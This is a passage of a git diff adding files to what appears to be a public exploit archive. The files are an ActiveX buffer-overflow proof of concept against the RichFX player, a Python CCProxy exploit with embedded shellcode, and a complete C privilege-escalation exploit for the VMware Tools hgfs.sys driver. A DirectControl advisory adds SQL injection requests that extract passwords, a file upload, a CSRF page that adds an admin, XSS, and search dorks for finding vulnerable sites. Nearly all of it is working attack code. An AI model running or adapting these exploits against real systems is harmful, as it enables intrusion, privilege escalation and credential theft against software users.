+
+   }
+  </script>
+
+ </head>
+ <body onload="JavaScript: return Check();">
+ </body>
+</html>
diff --git a/platforms/windows/dos/30805.html b/platforms/windows/dos/30805.html
new file mode 100755
index 000000000..2f5680003
--- /dev/null
+++ b/platforms/windows/dos/30805.html
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/26573/info
+
+RichFX Basic Player ActiveX Control is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
+
+Note that RichFX Player ActiveX Control is installed by default with RealNetworks RealPlayer. It may be shipped with other RealNetworks products as well. 
+
+<html>
+ <head>
+  <script language="JavaScript" DEFER>
+    function Check() {
+    var s = "AAAA";
+
+    while (s.length < 999999) s=s+s;
+
+     var obj = new ActiveXObject("RFXInstMgr.RFXInstMgr"); //{47F59200-8783-11D2-8343-00A0C945A819}
+
+
+     obj.DoInstall(s);
+     obj.QueryComponents(s);
+
+   }
+  </script>
+
+ </head>
+ <body onload="JavaScript: return Check();">
+
+ </body>
+</html>
diff --git a/platforms/windows/local/30783.py b/platforms/windows/local/30783.py
new file mode 100755
index 000000000..a5c868539
--- /dev/null
+++ b/platforms/windows/local/30783.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python
+
+# Exploit Title: CCProxy v7.3 Integer Overflow Exploit
+# Date: 2013/03/22
+# Author: Mr.XHat
+# E-Mail: Mr.XHat {AT} GMail.com
+# Vendor Homepage: http://www.youngzsoft.net/
+# Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe
+# Version: Prior To 7.3
+# Discovered By: Mr.XHat
+# Tested On: WinXP SP3 EN
+
+hdr = "[System]"
+hdr += "\x0d\x0a"
+hdr += "Ver=7.3"
+hdr += "\x0d\x0a"
+hdr += "Language="
+
+# EAX: 0x41414131
+buf = "\x41" * 1028
+gdt1 = "\x04\xB4\x12\x00"
+pad1 = "\x41" * 4
+gdt2 = "\xF4\xB3\x12\x00"
+pad2 = "\x41" * 12
+gdt3 = "\x04\xB4\x12\x00"
+
+sc = (
+# Avoid: '\x00\xff\xf5'
+"\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xba" +
+"\xb3\x5c\xb6\x83\xeb\xfc\xe2\xf4\x46\x5b\xd5\xb6\xba\xb3" +
+"\x3c\x3f\x5f\x82\x8e\xd2\x31\xe1\x6c\x3d\xe8\xbf\xd7\xe4" +
+"\xae\x38\x2e\x9e\xb5\x04\x16\x90\x8b\x4c\x6d\x76\x16\x8f" +
+"\x3d\xca\xb8\x9f\x7c\x77\x75\xbe\x5d\x71\x58\x43\x0e\xe1" +
+"\x31\xe1\x4c\x3d\xf8\x8f\x5d\x66\x31\xf3\x24\x33\x7a\xc7" +
+"\x16\xb7\x6a\xe3\xd7\xfe\xa2\x38\x04\x96\xbb\x60\xbf\x8a" +
+"\xf3\x38\x68\x3d\xbb\x65\x6d\x49\x8b\x73\xf0\x77\x75\xbe" +
+"\x5d\x71\x82\x53\x29\x42\xb9\xce\xa4\x8d\xc7\x97\x29\x54" +
+"\xe2\x38\x04\x92\xbb\x60\x3a\x3d\xb6\xf8\xd7\xee\xa6\xb2" +
+"\x8f\x3d\xbe\x38\x5d\x66\x33\xf7\x78\x92\xe1\xe8\x3d\xef" +
+"\xe0\xe2\xa3\x56\xe2\xec\x06\x3d\xa8\x58\xda\xeb\xd0\xb2" +
+"\xd1\x33\x03\xb3\x5c\xb6\xea\xdb\x6d\x3d\xd5\x34\xa3\x63" +
+"\x01\x43\xe9\x14\xec\xdb\xfa\x23\x07\x2e\xa3\x63\x86\xb5" +
+"\x20\xbc\x3a\x48\xbc\xc3\xbf\x08\x1b\xa5\xc8\xdc\x36\xb6" +
+"\xe9\x4c\x89\xd5\xdb\xdf\x3f\x98\xdf\xcb\x39\xb6"
+)
+
+exp = hdr+buf+gdt1+pad1+gdt2+pad2+gdt3+sc
+file = open("CCProxy.ini", "w")
+file.write(exp)
+file.close()
diff --git a/platforms/windows/local/30802.c b/platforms/windows/local/30802.c
new file mode 100755
index 000000000..8cdb6a5a5
--- /dev/null
+++ b/platforms/windows/local/30802.c
@@ -0,0 +1,365 @@
+source: http://www.securityfocus.com/bid/26556/info
+
+VMware Tools is prone to a privilege-escalation vulnerability.
+
+The application fails to properly drop privileges before performing certain functions. An attacker can exploit this in the guest opertaing system to elevate privileges in the host operating system. 
+
+/*
+        VMware Tools hgfs.sys Local Privilege Escalation Vulnerability Exploit
+                        Created by SoBeIt
+
+        Main file of exploit
+
+        Tested on:
+
+        Windows XP PRO SP2 Chinese
+        Windows XP PRO SP2 English
+        Windows 2003 PRO SP1 Chinese
+        Windows 2003 PRO SP1 English
+        
+        Usage:vmware.exe
+*/
+
+#include <stdio.h>
+#include <windows.h>
+#include <psapi.h>
+        
+#pragma comment (lib, "advapi32.lib")
+
+#define NTSTATUS        int
+#define ProcessBasicInformation        0
+#define SystemModuleInformation 11
+        
+typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
+typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
+typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
+typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG);
+typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID);
+typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOID, ULONG, USHORT, PULONG);
+
+ZWVDMCONTROL        ZwVdmControl;
+ZWQUERYINFORMATIONPROCESS        ZwQueryInformationProcess;
+ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
+ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory;
+RTLIMAGENTHEADER RtlImageNtHeader;
+RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;
+
+typedef struct _IMAGE_FIXUP_ENTRY {
+        USHORT        Offset:12;
+  USHORT        Type:4;
+} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
+
+typedef struct _PROCESS_BASIC_INFORMATION {
+      NTSTATUS ExitStatus;
+      PVOID PebBaseAddress;
+      ULONG AffinityMask;
+      ULONG BasePriority;
+      ULONG UniqueProcessId;
+      ULONG InheritedFromUniqueProcessId;
+} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
+
+typedef struct _SYSTEM_MODULE_INFORMATION {
+        ULONG Reserved[2];
+        PVOID Base;
+        ULONG Size;
+        ULONG Flags;
+        USHORT Index;
+        USHORT Unknow;
+        USHORT LoadCount;
+        USHORT ModuleNameOffset;
+        char ImageName[256];        
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+unsigned char kfunctions[64][64] = 
+{
+                                                        //ntoskrnl.exe
+        {"ZwTerminateProcess"},
+        {"PsLookupProcessByProcessId"},
+        {""},
+};
+
+unsigned char shellcode[] = 
+                "\x90\x60\x9c\xe9\xc4\x00\x00\x00\x5f\x4f\x47\x66\x81\x3f\x90\xcc"
+                "\x75\xf8\x66\x81\x7f\x02\xcc\x90\x75\xf0\x83\xc7\x04\xbe\x38\xf0"
+                "\xdf\xff\x8b\x36\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7\x95"
+                "\x8b\xf7\x6a\x02\x59\xe8\x4d\x00\x00\x00\xe2\xf9\x8b\x4e\x0c\xe8"
+                "\x29\x00\x00\x00\x50\x8b\x4e\x08\xe8\x20\x00\x00\x00\x5a\x8b\x7e"
+                "\x1c\x8b\x0c\x3a\x89\x0c\x38\x56\x8b\x7e\x14\x8b\x4e\x18\x8b\x76"
+                "\x10\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3\x83\xec\x04"
+                "\x8d\x2c\x24\x55\x51\xff\x56\x04\x85\xc0\x0f\x85\x80\x8f\x00\x00"
+                "\x8b\x45\x00\x83\xc4\x04\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78"
+                "\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33"
+                "\xdb\x0f\xbe\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1"
+                "\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e"
+                "\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x37\xff\xff"
+                "\xff\x90\x90\x90"
+
+                "\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";
+        
+void ErrorQuit(char *msg)
+{
+        printf("%s:%d\n", msg, GetLastError());
+        ExitProcess(0);
+}
+
+void GetFunction()
+{
+        HANDLE        hNtdll;
+        
+        hNtdll = LoadLibrary("ntdll.dll");
+        if(hNtdll == NULL)
+                ErrorQuit("LoadLibrary failed.\n");
+
+        ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
+        if(ZwVdmControl == NULL)
+                ErrorQuit("GetProcAddress failed.\n");
+                
+        ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
+        if(ZwQueryInformationProcess == NULL)
+                ErrorQuit("GetProcAddress failed.\n");
+                
+        ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
+        if(ZwQuerySystemInformation == NULL)
+                ErrorQuit("GetProcessAddress failed.\n");
+                
+        ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory");
+        if(ZwAllocateVirtualMemory == NULL)
+                ErrorQuit("GetProcAddress failed.\n");
+
+        RtlImageNtHeader = (RTLIMAGENTHEADER)GetProcAddress(hNtdll, "RtlImageNtHeader");
+        if(RtlImageNtHeader == NULL)
+                ErrorQuit("GetProcAddress failed.\n");
+                
+        RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)GetProcAddress(hNtdll, "RtlImageDirectoryEntryToData");
+        if(RtlImageDirectoryEntryToData == NULL)
+                ErrorQuit("GetProcAddress failed.\n");
+                
+        FreeLibrary(hNtdll);
+}
+
+ULONG GetKernelBase(char *KernelName)
+{
+        ULONG        i, Byte, ModuleCount, KernelBase;
+        PVOID        pBuffer;
+        PSYSTEM_MODULE_INFORMATION        pSystemModuleInformation;
+        PCHAR        pName;
+        
+        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
+                
+        if((pBuffer = malloc(Byte)) == NULL)
+                ErrorQuit("malloc failed.\n");
+                
+        if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
+                ErrorQuit("ZwQuerySystemInformation failed\n");
+        
+        ModuleCount = *(PULONG)pBuffer;
+        pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
+        for(i = 0; i < ModuleCount; i++)
+        {
+                if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
+                {
+                        KernelBase = (ULONG)pSystemModuleInformation->Base;
+                        printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
+                        free(pBuffer);
+                        strcpy(KernelName, "ntoskrnl.exe");
+                        
+                        return KernelBase;
+                }
+                
+                if((pName = strstr(pSystemModuleInformation->ImageName, "ntkrnlpa.exe")) != NULL)
+                {
+                        KernelBase = (ULONG)pSystemModuleInformation->Base;
+                        printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
+                        free(pBuffer);
+                        strcpy(KernelName, "ntkrnlpa.exe");
+                        
+                        return KernelBase;
+                }
+                
+                pSystemModuleInformation++;
+        }
+                
+        free(pBuffer);
+        return 0;
+}
+
+ULONG GetServiceTable(PVOID pImageBase, ULONG Address)
+{
+        PIMAGE_NT_HEADERS        pNtHeaders;
+        PIMAGE_BASE_RELOCATION        pBaseRelocation;
+        PIMAGE_FIXUP_ENTRY        pFixupEntry;
+        ULONG        RelocationTableSize = 0;
+        ULONG        Offset, i, VirtualAddress, Rva;
+
+        Offset = Address - (ULONG)pImageBase;
+        pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase);
+        pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, FALSE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize);
+        if(pBaseRelocation == NULL)
+                return 0;
+                
+        do 
+        {
+                pFixupEntry = (PIMAGE_FIXUP_ENTRY)((ULONG)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
+       
+                RelocationTableSize = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
+                for(i = 0; i < RelocationTableSize; i++, pFixupEntry++)
+                {
+                        if(pFixupEntry->Type == IMAGE_REL_BASED_HIGHLOW)
+                        {
+                                VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset;
+                                Rva = *(PULONG)((ULONG)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;
+                               
+                                if(Rva == Offset)
+                                {
+                                   if (*(PUSHORT)((ULONG)pImageBase + VirtualAddress - 2) == 0x05c7)
+                                                return *(PULONG)((ULONG)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase;
+                                }
+                        }
+                }
+
+                *(PULONG)&pBaseRelocation += pBaseRelocation->SizeOfBlock;
+       
+        } while(pBaseRelocation->VirtualAddress);
+
+        return 0;
+}
+
+ULONG ComputeHash(char *ch)
+{
+        ULONG ret = 0;
+
+        while(*ch)
+        {
+                ret = ((ret << 25) | (ret >> 7)) + *ch++;
+        }
+
+        return ret;
+}
+
+int main(int argc, char *argv[])
+{
+        PVOID                pDrivers[256];
+        PULONG        pStoreBuffer, pTempBuffer, pShellcode;
+        PUCHAR        pRestoreBuffer, pBase, FunctionAddress;
+        PROCESS_BASIC_INFORMATION pbi;
+        SYSTEM_MODULE_INFORMATION        smi;
+        OSVERSIONINFO        ovi;
+        char                DriverName[256], KernelName[64];
+        ULONG                Byte, len, i, j, k, BaseAddress, Value, KernelBase, buf[64];
+        ULONG                HookAddress, SystemId, TokenOffset, Sections, Pid, FunctionNumber;
+        ULONG                SSTOffset, AllocationSize;
+        HANDLE        hDevice, hKernel;
+
+        printf("\n VMware Tools hgfs.sys Local Privilege Escalation Vulnerability Exploit \n\n");
+        printf("\t Create by SoBeIt. \n\n");
+        if(argc != 1)
+        {
+                printf(" Usage:%s \n\n", argv[0]);
+                return 1;
+        }
+        
+        GetFunction();
+
+        if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
+                ErrorQuit("ZwQueryInformationProcess failed\n");
+
+        KernelBase = GetKernelBase(KernelName);
+        if(!KernelBase)
+                ErrorQuit("Unable to get kernel base address.\n");
+                
+        printf("Kernel base address: %x\n", KernelBase);
+        
+        ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+        
+        if(!GetVersionEx(&ovi))
+                ErrorQuit("GetVersionEx failed.\n");
+        
+        if(ovi.dwMajorVersion != 5)
+                ErrorQuit("Not Windows NT family OS.\n");
+                
+        printf("Major Version:%d Minor Version:%d\n", ovi.dwMajorVersion, ovi.dwMinorVersion);
+        switch(ovi.dwMinorVersion)
+        {
+                case 1:                                                //WindowsXP
+                        SystemId = 4;
+                        TokenOffset = 0xc8;
+                        break;
+                        
+                case 2:                                                //Windows2003
+                        SystemId = 4;
+                        TokenOffset = 0xc8;
+                        break;
+                        
+                default:
+                        SystemId = 8;
+                        TokenOffset = 0xc8;
+        }
+        
+        pRestoreBuffer = malloc(0x100);
+        if(pRestoreBuffer == NULL)
+                ErrorQuit("malloc failed.\n");
+                
+        hKernel = LoadLibrary(KernelName);
+        if(hKernel == NULL)
+                ErrorQuit("LoadLibrary failed.\n");
+
+        printf("Load Base:%x\n", (ULONG)hKernel);
+        SSTOffset = GetServiceTable(hKernel, (ULONG)GetProcAddress(hKernel, "KeServiceDescriptorTable"));
+        SSTOffset += KernelBase;
+        printf("SystemServiceTable Offset:%x\n", SSTOffset);
+        FunctionNumber = *(PULONG)((ULONG)ZwVdmControl + 1);
+        printf("NtVdmControl funciton number:%x\n", FunctionNumber);
+        HookAddress = (ULONG)(SSTOffset + FunctionNumber * 4);
+        printf("NtVdmCotrol function entry address:%x\n", HookAddress);
+
+        AllocationSize = 0x1000;
+        pStoreBuffer = (PULONG)0x7;
+        if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, &pStoreBuffer, 0, &AllocationSize,
+                                MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE))
+                ErrorQuit("ZwAllocateVirtualMemory failed.\n");
+
+        FunctionAddress = (PUCHAR)GetProcAddress(hKernel, "NtVdmControl");
+        if(FunctionAddress == NULL)
+                ErrorQuit("GetProcAddress failed.\n");
+                
+        *(PULONG)pRestoreBuffer = FunctionAddress - (PUCHAR)hKernel + KernelBase;
+        
+        memset((PVOID)0x0, 0x90, AllocationSize);
+
+        hDevice = CreateFile("\\\\.\\HGFS", FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
+        if(hDevice == INVALID_HANDLE_VALUE)
+                ErrorQuit("CreateFile failed.\n");
+                                        
+        pShellcode = (PULONG)shellcode;
+        for(k = 0; pShellcode[k++] != 0x90cccc90; )
+                                ;
+
+        for(j = 0; kfunctions[j][0] != '\x0'; j++)
+                buf[j] = ComputeHash(kfunctions[j]);
+
+        buf[j++] = pbi.InheritedFromUniqueProcessId;
+        buf[j++] = SystemId;
+        buf[j++] = (ULONG)pRestoreBuffer;
+        buf[j++] = HookAddress;
+        buf[j++] = 0x4;
+        buf[j++] = TokenOffset;
+        
+        memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
+        memcpy((PUCHAR)pStoreBuffer + 0x20, shellcode, sizeof(shellcode) - 1);
+
+        pTempBuffer = malloc(0x1000);
+        memset(pTempBuffer, 0x44, 0x1000);
+        
+        DeviceIoControl(hDevice, 0x14018F, (PVOID)HookAddress, 0x4, pTempBuffer, 0x4, &Byte, NULL);
+
+        CloseHandle(hDevice);
+        CloseHandle(hKernel);
+
+        printf("Exploitation finished.\n");
+        ZwVdmControl(0, NULL);
+
+        return 1;
+}
+//
diff --git a/platforms/windows/webapps/30669.txt b/platforms/windows/webapps/30669.txt
new file mode 100755
index 000000000..ffcd5ba28
--- /dev/null
+++ b/platforms/windows/webapps/30669.txt
@@ -0,0 +1,138 @@
+DirectControlTM Version 3.1.7.0  - Multiple Vulnerabilties
+====================================================================
+
+####################################################################
+.:. Author         : AtT4CKxT3rR0r1ST
+.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
+.:. Home           : http://www.iphobos.com/blog/
+.:. Script         : www.directclarity.com
+.:. Dork           : [1]intext:"DirectClarity, LLC All Rights Reserved."
+                     [2]inurl:"/cm/password_retrieve.asp?redir_id=1"
+####################################################################
+
+################################
+[1] Sql Injection
+===================
+type: Post String Mssql Injection
+
+
+extrct version database:
+-------------------------
+
+POST /cm/password_retrieve.asp HTTP/1.1
+Host: www.server.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
+Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site/cm/password_retrieve.asp
+Cookie: __utma=
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 98
+redir_id=1&uname=' and+1=cast(@@version as int)--
+-&email_password=Email+My+Password
+HTTP/1.1 500 Internal Server Error
+Content-Type: text/html
+Cache-Control: private
+Server: Microsoft-IIS/7.5
+X-Powered-By: ASP.NET
+Date:
+Content-Length: 352
+
+
+
+
+redir_id=1&uname=|command|&email_password=Email+My+Password
+
+
+extrct Username & password:
+----------------------------
+
+information:
+tablename:portal_accounts
+columns: username , password
+
+
+POST /cm/password_retrieve.asp HTTP/1.1
+Host: www.server.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
+Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site/cm/password_retrieve.asp
+Cookie: __utma=
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 98
+redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts)
+as int)
+-- -&email_password=Email+My+Password
+HTTP/1.1 500 Internal Server Error
+Content-Type: text/html
+Cache-Control: private
+Server: Microsoft-IIS/7.5
+X-Powered-By: ASP.NET
+Date:
+Content-Length: 352
+
+
+username:
+redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts)
+as int)
+-- -&email_password=Email+My+Password
+
+password:
+redir_id=1&uname=' and+1=cast((Select TOP 1 password from portal_accounts)
+as int)
+-- -&email_password=Email+My+Password
+
+
+[2] Arbitrary File Upload
+==========================
+
+http://site/cm/fileManage/default.asp?action=UploadFiles&path=/cm/media/images
+
+your file:
+http://site/cm/media/images
+
+
+[3] CSRF [Add Admin]
+=====================
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="http://site/cm/admin.asp">
+<input type="hidden" name="fname" value="...."/>
+<input type="hidden" name="lname" value="...."/>
+<input type="hidden" name="uname" value="admin"/>
+<input type="hidden" name="pword" value="123456"/>
+<input type="hidden" name="telco" value="...."/>
+<input type="hidden" name="email" value="...."/>
+<input type="hidden" name="ustat" value="0"/>
+<input type="hidden" name="SecGroupDropDown" value="1"/>
+<input type="hidden" name="AddButton" value="ADD THIS USER"/>
+<input type="hidden" name="pageView" value="User Administration"/>
+<input type="hidden" name="pageAction" value="Add System User"/>
+<input type="hidden" name="whatDo" value="AddUserAction"/>
+</form>
+</body>
+</html>
+
+
+[4] Cross Site Scripting
+=========================
+
+Go to:
+http://site/cm/admin.asp?pageView=General Configuration&pageAction=RSS
+Management
+
+and add new channel
+put in new channel:
+<script>alert(document.cookie);</script>
+
+and submit!
+
+####################################################################